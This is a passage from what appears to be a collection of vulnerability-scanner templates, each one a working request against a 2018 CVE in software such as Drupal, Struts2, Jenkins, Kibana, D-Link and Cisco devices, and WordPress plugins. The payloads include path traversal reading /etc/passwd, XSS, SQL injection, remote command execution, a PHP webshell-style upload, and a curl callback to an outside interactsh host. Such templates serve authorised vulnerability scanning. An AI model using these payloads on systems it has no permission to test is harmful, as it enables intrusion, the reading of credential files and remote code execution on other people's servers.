Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication 